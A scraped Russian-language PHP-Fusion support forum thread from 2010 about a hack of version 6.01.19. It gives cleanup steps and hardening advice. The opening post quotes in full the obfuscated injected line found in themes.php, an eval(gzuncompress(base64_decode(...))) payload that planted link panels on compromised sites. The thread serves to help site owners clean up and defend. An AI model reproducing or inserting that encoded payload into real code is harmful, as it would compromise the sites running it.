На заглавную  |  Контактная информация и обратная связь  |  Поиск    Главная  |  Статьи  |  Downloads  |  Форум  |  FAQ  |  Версия для КПК   September 19 2019 11:54:38  
WEB Design & PHP перейти на главную Статьи Ответы на часто задаваемые вопросы Загрузки Форум
PHP-Fusion Украинская поддержка Статьи Ответы на часто задаваемые вопросы Загрузки Форум
 
 Навигация
Новости
Статьи

FAQ
Поиск

Учебник по HTML
Карта сайта
Ссылки
Обратная связь


Альтернативная карта сайта
RSS новости
Версия для КПК
 
 Спонсоры проекта


Кондиционеры в Киеве


 
 Рассылка новостей
Только для зарегистрированных пользователей
 
 Ваш IP адрес
34.226.234.20
 
 Рекомендуем посетить
 
 Загрузки
Новые файлы
Professional Download ...
База игр
Мод "проверочный код +...
Мод "login redirect"
Мод "register.php + но...
Errors mod
unactivated users v3.0
Мод "index.php + мод п...
Мод "проверочный код в...
Менеджер смайлов
Переработанный плагин ...
Панель статистики (форум)
Гостевая книга
Панель "навигация + св...
Система баннеро-обмена
See bot info
Обновление для версии ...
PHP-Fusion 6.01.12
Руководство пользовате...
Обновление для версии ...

Toп 20 файлов
Колекция кнопочек, ука... [6995]
Плагин интернет магази... [4738]
Button Panel v1.0 [4339]
Professional Download ... [3890]
Black_Tomato [3880]
"Koмпьютерная" тема дл... [3842]
BlueIce-Skaidon [3795]
Карта сайта для PHP-Fu... [3776]
PHP-Fusion 6.01.12 [3614]
Панель "навигация + св... [3475]
Rss парсер для PHP-Fusion [3459]
slideshows_random_phot... [3312]
ZoneCopper [3250]
Руководство пользовате... [3250]
MP3 Архив v.2.0 [3234]
F-Liquid [3168]
FT03 [3163]
Работающий TinyMCE.. [3141]
Голосование для всех (... [3140]
Переработанный плагин ... [2971]
 
 Рекомендуем посетить
 
Регистрация и вход
 
 
 Просмотр темы
Web Design PHP-Fusion Ukraine плагины и темы для php-fusion шаблоны сайтов форум поддержки. | PHP-Fusion помощь и советы | Поддержка PHP-Fusion
Автор Уязвимость в 6.01.19
Jackson
Администратор проекта

Avatar пользователя

Сообщений: 138
Откуда: Синельниково
Зарегистрирован: 07.05.06
Опубликовано 13-03-2010 10:28
Всем привет. Со вчерашнего дня замечена уязвимость. Злоумышленник получает контроль и устанавливает панель со ссылками.

Нужно:
1. Удалить из папки images лишние файлы (avatars.php и panel.php) а также файл .htacess из корня и папки avatars, также в ней прибить файл images.php
2. В папке infusions заменить полностью папки member_poll_panel и navigation_panel.
3. Файл themes.php поправить.
Найти такую или подобную строчку:
function render_header($header_content){ {eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj'smiley));eval(gzuncompress(base64_decode('eJy9Vllv2zgQfnaA/AeaEAIJdWXJV50WaptFtOkCm2yRun1pAkGmyFiIRQqk1GyR5r/vkDqsus1ZbGVYBznXNxdnd4dKKWQkaS5kkfIL23Ne7e6wkpMiFRypNMvXNLqghW2V8QBZMnZ2d653d3pvLYUCxJQglyKn3MZ5uXRjDkxXQq4TN+VM4MHciOv1VCFpnEWKFlGRZlSUIE8N0LjaZXlZKLOAj8IFGpIhWVFy6ear/E0ZB9gt5ZpyIhKqrXBcvCe3VqVZVfz71ehDePopPP2Mq2d0cnAc4nOgRO8Wi/dD3/XO+DuhipfoJ8af8TOOK/ssEWBs3q5W6ZrafUYFA3sdB1nCDRi4x5jve57XcqhyCahtSwzgkQul3/CZBLFSC342qbGTtVBUC4NPtHVJWpSSgxLYu+mERVJSSpV+oRC4TMAjSWGpEPKrbbWvEC2a5cXX4M+Dvz+EddhSZjeGbQif+w4KAoSHGKh61wZAuwtR/pHD0zza/ptKZp+BXyL6b6q0J1o6B337hvqp0vZ1l1s1NUBjoRFH14pqecADGZPES3D3gxkry1cxT9YUzNZ5uaV4E0RkG17UB+C2lRY0Aw6t0nBUMhyjr1KoUVZkffAUpNDeHup8u8Z1DW3PyuNiBQI3ql3wrmsYXlUkIK9xjCaGXKrWawm9u2JsGGo5G+RwlXyd8sstAvMwd3MzCddFaeg0PJMuOhOajOlg78vsJ0Fszd2OR1dhvbc4/RjWKdPN5VymvIiI4NASSAyFHxSypFW66hoYDtERLRA4DlpUDPnYWlDtW3oH1sDbKU9Nq8JlvhZxEhVZrr1WVTFgMPjshkFX74YX+CLCLqIvsXwSf6tbUaUAl6tiiJmOw+PVP02EFYUnnz7jxfF7fP4o8sO/Th/FET5QA9x5nFFbr8CLjTE0eB5j5yFooMSAytChOjF0yXX7DG7Ih944mdBJMlqORuMpm9LRjM5H3tyfzAkhI38EpZcl086BoPt/9BG+ooOj8GSBz93N3ml4/M8ijA4OD8EtYNTTtU4mU9+jL6hPJ/tzNpsSOvXGZEaI780YfOBNP9MojRaTCFAMlP82hEEQYL/uX3Bw/ZIZ90M23UH3rEZfdbTeoHrtujk/O6PH7agGt6F61Xi1yp2mmW2fsM31NrvU7e3hSGsgPYsFrBqAfkesoICunjWq2ZWE88S22ADB8QxTD4wYzmsfvUEQTvQSYQ9vDxXNtMFqEdpB/f81uzdHIssf76l7dXznkI1H8kEnffCREBdr+ocohguqCs3ju+ZXt6LeZgxjebPyJHuX/niWJJN9f/YiidmUxfHSI2y2P16yKZlPGR7cYi7SY7F9uzntaar/lKxENRRuZXjbSippz204Wp1fqud7ATmvJ+MRjL0/ltYd1YbummAfWYPbkm/aEaMzWWjC/wDEuZrj'smiley));



И заменить ее на :
function render_header($header_content){




В общем у меня вылетело ночью 4 сайта так, Маф говорил что у него хакнули даже сайт к которому доступ завязан к IP.

Пусть ваш сайт начнет зарабатывать!

А всех своих женщин посылаем на....всеукраинскую женскую конференцию smiley
307084922 http://azovka.com.ua
Автор RE: Уязвимость в 6.01.19
567user
Пользователь

Сообщений: 4
Откуда: москва
Зарегистрирован: 17.01.10
Опубликовано 28-04-2010 12:01
В разделе Загрузки - PHP-Fusion основные файлы , по ссылке PHP-Fusion 6.01.12 грузится версия PHP-Fusion 6.01.19.

В ней уже внесены изменения, предотвращающие уязвимость?
Изменил(а) 567user, 28-04-2010 12:08
Автор RE: Уязвимость в 6.01.19
maf
Администратор проекта

Сообщений: 950
Зарегистрирован: 06.05.06
Опубликовано 19-05-2010 11:19
А кто Вам точно и гарантированно может сказать? Мы не разработчики. Последняя версия это 7.00.07 если собрались ставить сайт с нуля, просто я лично седьмую версию не люблю, да и не работает до сих пор в ней даже половина того что есть на шестую, хотя ей уже лет и лет.. smiley

Автор RE: Уязвимость в 6.01.19
Gam
Пользователь

Сообщений: 110
Зарегистрирован: 22.03.07
Опубликовано 17-06-2010 07:59
как исправить эту уязвимость? постоянно какую нибудь гадость подгружают ((
Автор RE: Уязвимость в 6.01.19
maf
Администратор проекта

Сообщений: 950
Зарегистрирован: 06.05.06
Опубликовано 17-06-2010 14:06
Хороший вопрос.... Залить с заменой файлов все файлы от последней версии(если 6 то 6 если 7 то 7), заменить префикс стандартный fusion_ на что-то свое типа xrenygadaesh_ поставить заглушку апача на админку, поменять пароли в последовательности - фтп, пароль администратора, пароль на базу данных.
Проверить так ли уж действительно Вам необходимы права на папки 777- может достаточно 755..
Переименовать в папке администратора файлы отвечающие за редактирование жизненно важных параметров- в частности редактирование и создание панелей, главные настройки, отдельные страницы, установки форума и фотогалереи (там можно задать тип разрешенных для загрузки файлов), управление администраторами. Просто достаточно дописать к таким файлам свое какое-то легко запоминаемое слово типа panels.php заменить на panels123.php
Вам данные настройки нужны раз в месяц максимум а вредителя это остановит.

Автор RE: Уязвимость в 6.01.19
Gam
Пользователь

Сообщений: 110
Зарегистрирован: 22.03.07
Опубликовано 23-06-2010 12:08
maf, спасибо.
Еще несколько вопросов:

1. Префикс fusion_ менять прямо в пхп-майадмин? Т.е. если прямо в БД префиксы поменять - ничего плохого не будет?
2. Что значит "поставить заглушку апача"?
3. Если на папки themes, infusions/member_poll_panel, nfusions/navigation_panel, images/avatars поставить 755 - что именно поменяется? Аватары загружаться не будут? еще что то?
Автор RE: Уязвимость в 6.01.19
maf
Администратор проекта

Сообщений: 950
Зарегистрирован: 06.05.06
Опубликовано 23-06-2010 19:41
Gam написал:
1. Префикс fusion_ менять прямо в пхп-майадмин? Т.е. если прямо в БД префиксы поменять - ничего плохого не будет?
2. Что значит "поставить заглушку апача"?
3. Если на папки themes, infusions/member_poll_panel, nfusions/navigation_panel, images/avatars поставить 755 - что именно поменяется? Аватары загружаться не будут? еще что то?

1 Сбекапить базу и автозаменой любым редактором, вплоть даже блокнотом можно, заменить fusion_ на novoechtoto_ востановить на хосте и прописать новый префикс в файле config.php (корень сайта)
2 Практически в любой панели управления сайтом есть функция "защитить директорию" (называться может иначе принцип тот же) защищает директорию посредством сверки имени пользователя и пароля заданного в файле .htaccess с заданными (как правило хранятся в файле .passwd на уровень выше папки с сайтом (public html))
Если нет в панели тако возможности то можно сделать самостоятельно на домашнем компьютере
пример как самому сотворить .htaccess http://www.softtime.ru/info/articlephp.php?id_article=27

на все вышеприведенные папки и не должно стоять 777!
-777 только на папки
# administration/db_backups/ (типа чтоб создавались бекапы не через пхп майадмин а через админку..)
# images/ (загрузка картинок)
# images/imagelist.js (список загруженных на сайт картинок)
# images/articles/ (картинки для статей)
# images/avatars/ (аватары)
# images/news/ (картинки для новостей)
# images/news_cats/ (картинки для категорий новостей)
# images/photoalbum/ (фотоальбом)
# images/photoalbum/submissions/ (присланное пользователями фото в фотоальбом)
# forum/attachments/ (прикрепленные к форуму файлы)

Что из этого Вам конкретно необходимо на то и оставляйте.

Перейти на форум:
 

Украинская Баннерная Сеть
 
 Категории новостей
Для просмотра нажмите стрелку слева Наш банер
RSS новости php fusion  Новости RSS
 Просьба...
Убедительная просьба!
Свои вопросы касательно
PHP-Fusion,
задавать в форум,
а не в миничат!

Миничат для флуда,
а если хотите получить ответ,
то к Вам убедительная просьба
- - - -

Пишите в форум!!!

 
Для просмотра нажмите стрелку слева 
Смена Темы
Нажмите (F5) для обновления
 Мини-чат
Вам необходимо залогиниться.

Titan2
06/02/2019 02:07
Усановил submit_news_with_h tml_editor , но там надо подтверждение админом а мне не надо как єто сделать ПЛИЗЗ

maf
06/06/2013 15:10
Зачем на амеров пинять - сами то что полезного сделали хоть раз? Или абы только потрындеть?

kot2007
18/05/2013 11:31
Почитав про USA http://www.php-fusion.co.
uk/news.php?readmore=572 , згадав про цей сайт... А тут вже все пилом припало і павутиною заросло smiley


maf
30/11/2012 00:33
? вам поговорить или проспамиться? ваша ссылка в ноиндексе ))

Dino
12/11/2012 23:47
Гых... народу, скажем, не густо %)

Архив чата
 
 Категории статей
 Последние статьи
Создание и раскрутка...
Шаблоны сайтов или о...
Как выбрать камеру в...
Устройство тем в Php...
Файл robots.txt и ег...
Выбор ключевых слов ...
Работа с кодировками
Индекс цитирования
PHP 5 -что изменилось?
 
 Партнеры проекта